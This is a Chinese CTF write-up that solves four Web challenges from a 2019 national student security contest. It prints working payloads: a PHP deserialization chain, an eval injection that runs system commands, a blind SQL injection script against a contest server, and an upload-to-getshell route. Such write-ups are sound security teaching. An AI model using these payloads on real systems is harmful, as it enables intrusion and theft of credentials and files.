第12届全国大学生信息安全竞赛Web题解

2019-04-23 约 2267 字 预计阅读 5 分钟

声明:本文 【第12届全国大学生信息安全竞赛Web题解】 由作者 mochazz 于 2019-04-23 09:58:00 首发 先知社区 曾经 浏览数 566 次

感谢 mochazz 的辛苦付出!

这次国赛的Web题目质量还不错,这里做个记录。

JustSoso

根据 html注释 结合 php伪协议 ,可以读取出 index.phphint.php 的源代码。

http://xxx/index.php?file=php://filter/read/convert.base64-encode/resource=index.php

http://xxx/index.php?file=php://filter/read/convert.base64-encode/resource=hint.php

index.php 中会反序列化 $_GET["payload"] ,且 parse_url 函数处理后不能包含 flag 字符串,用 /// 即可绕过 parse_url 函数,具体可参考 http://www.am0s.com/functions/406.html

hint.php 中的对象在反序列化的时候,会先调用 __wakeup 魔术方法,其会把对象的所有属性置 null,猜测考察的知识点是绕过 PHP反序列化 的一个 bug ,具体参考: https://mochazz.github.io/2018/12/30/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96bug/

最后获取 flag 的地方,需要 $this->token === $this->token_flag ,而 $this->token_flag 在每次调用 getFlag 函数都会重新生成,这时候我们便可以用引用变量来解决这个问题。最终 payload 如下:

<?php  
class Handle{ 
    private $handle;  
    public function __construct($handle) { 
        $this->handle = $handle; 
    } 
    public function __destruct(){
        $this->handle->getFlag();
    }
}

class Flag{
    public $file;
    public $token;
    public $token_flag;

    function __construct($file){
        $this->file = $file;
        $this->token = &$this->token_flag;
    }

    public function getFlag(){
        // $this->token_flag = md5(rand(1,10000));
        if($this->token === $this->token_flag)
        {
            if(isset($this->file)){
                echo @highlight_file($this->file,true); 
            }  
        }
    }
}

$flag = new Flag('flag.php');
$handle = new Handle($flag);

echo urlencode(str_replace('O:6:"Handle":1', 'O:6:"Handle":10', serialize($handle)));
?>

最后访问 http://xxx///index.php?file=hint.php&payload=上面生成的payload 即可。

最后贴一个PHP反序列化标识符含义:

a - array
b - boolean
d - double
i - integer
o - common object
r - reference
s - string
C - custom object
O - class
N - null
R - pointer reference
U - unicode string

https://blog.csdn.net/heiyeshuwu/article/details/748935

love_math

calc.php 源码如下:

可以看到 $content 会经过黑白名单校验且长度不能大于等于80,通过校验的 $content 最终会在 eval 函数中执行。看到这个,就想起了之前遇到的无字母 webshell 的题目。而这里只能用 $whitelist 中的函数。在查阅 base_convert 函数时,发现其可以进行2~36进制之间的转换,超过9的部分用字母a-z表示,即可表示的字符范围是:0-9a-z。,下面我们就可以构造最简单的 phpinfo: base_convert(55490343972,10,36)()

➜  Desktop php -a

php > echo base_convert('phpinfo',36,10);
55490343972

执行 system('ls') :base_convert(1751504350,10,36)(base_convert(784,10,36))

➜  Desktop php -a

php > echo base_convert('system',36,10);
1751504350
php > echo base_convert('ls',36,10);
784
php > echo strlen('base_convert(1751504350,10,36)(base_convert(784,10,36))');
55

由于不能引入0-9a-z以外的字符,所以这里又通过构造 hex2bin 来执行命令。

➜  Desktop php -a

php > echo base_convert('exec',36,10);
696468
php > echo base_convert('hex2bin',36,10);
37907361743
php > echo hexdec(bin2hex('ls *'));
1819484202
php > echo strlen('base_convert(696468,10,36)(base_convert(37907361743,10,36)(dechex(1819484202)))');
79

但是用 exec 有个问题,就是只会显示返回结果的最后一行,这样就没办法看到 flag ,强行构造就超出80字符的限制了。后来又想到之前做的40字符限制的题目,想着应该要通过其他参数引入的方式,打破字符长度限制,于是开始构造 $_GET

➜  Desktop php -a

php > echo base_convert('hex2bin',36,10);
37907361743
php > echo hexdec(bin2hex('_GET'));
1598506324

payload:
$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=tac flag.php
相当于:
$pi=_GET;($_GET[pi])($_GET[abs])

我们将要执行的函数和参数通过其他参数引入,这里变量名和函数名必须在白名单中。

这里有用到一个trick,就是使用 {} 来代替 [] 进行数组索引,这个其实在PHP手册中有提到,具体参看这个用力的Note: https://www.php.net/manual/en/language.types.array.php#language.types.array.syntax.accessing 。另外PHP5和7的一些差别,可以参看一下手册: https://www.php.net/manual/zh/migration70.php

全宇宙最简单的SQL

WAF 会将某些字符替换成 QwQ ,经过测试,发现过滤了 |、or、sleep、if、benchmark、case 等字符。

返回信息有两种:

  • SQL语法正确的话,如果账号密码不对,会显示 登陆失败 。例如: username=admin&password=admin
  • SQL语法不正确的话,会显示 数据库操作失败 。例如: username=admin'&password=admin

那么我们可以利用逻辑运算符和溢出报错来进行注入,例如这里我们用 pow(9999,100) ,这个表达式的值在 MYSQL 中已经超出 double 范围,会溢出。如下图,当我们盲注语句结果为真时,就会执行到溢出语句,返回结果为 数据库操作失败 ;当我们盲注语句结果为假时,由于 and短路运算 ,根本不会执行到溢出语句,所以返回结果为 登陆失败

通过这种注入方式,我们可以得到以下信息:

  • mysql版本:5.5.62
  • 库名:ctf
  • 用户:ctt123

但是无法注出表名和列名,因为 or 被过滤了, information_schema 就不能用了。不过我们可以通过语句: admin'^1+and+substr((select+username+from+user+limit+1),1,1)='a'+and+pow(9999,100)%23 ,判断出其存在 user 表和 username 列,再根据题目的界面显示的内容,猜测其可能还存在 password 列。但是 password 又包含 or 关键字,这时想起了以前看过的一篇文章:如何在不知道MySQL列名的情况下注入出数据? 。最终可以用这个技巧注出 admin 用户的密码: f1ag@1s-at_/fll1llag_h3r3 ,注入脚本如下:

import requests,re

url = "http://39.97.167.120:52105"
admin_pass = ''
charset = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!$%&\'()*+,-./:;<=>?@[\\]^_`}{~#'
for i in range(1,100):
    for char in charset:
        if char == '#':
            # print('#')
            # print(admin_pass)
            exit()
        datas = {
            'username' : "admin'^1 and substr((select `2` from (select 1,2 union select * from user)a limit 1,1),%d,1)='%s' and pow(9999,100)#" % (i,char),
            'password' : 'admin'
        }
        r = requests.post(url=url,data = datas)
        r.encoding = r.apparent_encoding
        if '数据库操作失败' in r.text:
            # print(char)
            admin_pass += char
            print(admin_pass)
            break

但是仍然还是无法登录,看密码的含义,应该要读取 /fll1llag_h3r3 文件。但是用了 Mysql 中的读取函数,发现并不行,于是又想到我上面的脚本直接比较的是字符,可能存在大小写问题。后来用ASCII值来判断,跑出来的结果是: F1AG@1s-at_/fll1llag_h3r3 。再次登录,发现多了远程连接 Mysql 的功能。

这个考点,一下子让我想起上周DDCTF的题目。通过伪造 Mysql 服务端,任意读取连接过来的客户端的本地文件,从而获取flag。这里我直接用github上写好的脚本,修改代码中的文件名即可。 https://github.com/allyshka/Rogue-MySql-Server

RefSpace

通过 php伪协议 可以获得题目环境中的文件结构如下:

➜  html tree 
.
├── app
│   ├── flag.php
│   ├── index.php
│   └── Up10aD.php
├── backup.zip
├── flag.txt
├── index.php
├── robots.txt
└── upload

2 directories, 7 files

源码如下:

可以看到 index.php 中存在任意文件包含,但是限制了文件名后缀只能是 .php ,而 app/Up10aD.php 文件中存在上传功能,刚好可以配合前面的文件包含进行 getshell 。具体可以参考:zip或phar协议包含文件 。getshell之后,只在服务器上发现了加密后的flag.txt。在 app/flag.php 开头添加上如下代码,访问时 $key 值随便填。

namespace interesting;
function sha1($var) { // 调用类的私有、保护方法
    $class = new \ReflectionClass('interesting\FlagSDK');
    $method = $class->getMethod('getHash');
    $method->setAccessible(true);
    $instance = $class->newInstance();
    return $method->invoke($instance);
}

其原理就是通过命名空间,定义一个同名函数 sha1 ,在代码调用时,会优先调用本命名空间中的同名函数。另外还有一个考点就是通过反射调用类的私有、保护方法,具体百度即可。绕过 sha1 的比较,我们就能拿到flag了,backup.zip/sdk开发文档.txt 中的 return "too{young-too-simple}" 只是个例子,其真正的语句类似 return openssl_decrypt(file_get_contents(‘flag路径), '加密算法', $key)

关键词:[‘安全技术’, ‘CTF’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now